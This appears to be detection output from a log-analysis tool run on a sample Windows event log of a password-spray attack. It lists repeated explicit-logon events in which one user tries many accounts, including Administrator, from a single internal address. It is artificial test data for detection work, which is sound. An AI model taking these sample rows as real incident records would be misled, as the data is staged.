2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
